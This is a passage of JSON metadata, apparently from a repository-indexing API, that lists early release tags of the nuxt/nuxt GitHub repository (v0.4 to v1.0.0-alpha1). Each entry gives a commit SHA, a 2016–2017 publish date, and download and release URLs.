syste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677af